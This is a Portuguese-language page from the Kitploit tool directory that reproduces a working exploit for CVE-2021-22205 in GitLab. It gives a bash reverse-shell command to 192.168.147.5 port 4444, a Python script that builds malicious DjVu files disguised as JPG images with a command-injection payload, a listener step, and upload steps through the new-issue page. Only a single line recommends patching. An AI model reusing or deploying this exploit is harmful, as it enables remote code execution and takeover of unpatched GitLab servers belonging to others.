Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
Ferramentas/GitHubGitHub/shang159/cve-2021-22205-getshell
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Ver Repositório
3há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Versão de teste

Comando para construir e gerar o exploit

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

Usar djvumake para gerar a imagem do exploit

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1

Escutar localmente na porta 4444 aguardando reverse shell

root@kitploit:~
nv -lv 192.168.147.5 4444

Enviar imagens separadamente para o GitLab

  • Aqui está a diferença em relação aos exploits online: muitos exploits de vulnerabilidade usam GitLab de versões mais altas, provavelmente versões 12 ou 13, e o ponto de upload é na criação de novos Snippets, caminho: /uploads/user
  • A versão que verifiquei é a 11.10.0. Ao usar o caminho de upload público /uploads/user, retorna 404. Usando o caminho de upload de Snippets /uploads/personal_snippet, não é possível executar o comando.
  • Finalmente, ao enviar a imagem pela página de criação de nova issue, consegui executar o comando com sucesso.

Reverse shell bem-sucedido obtendo acesso à máquina alvo

Após enviar as três imagens separadamente, a terceira imagem executará o comando de reverse shell, obtendo acesso à máquina alvo com sucesso.

Recomendação de correção

Atualize o GitLab para a versão de segurança mais recente o mais rápido possível.

Baixar ferramenta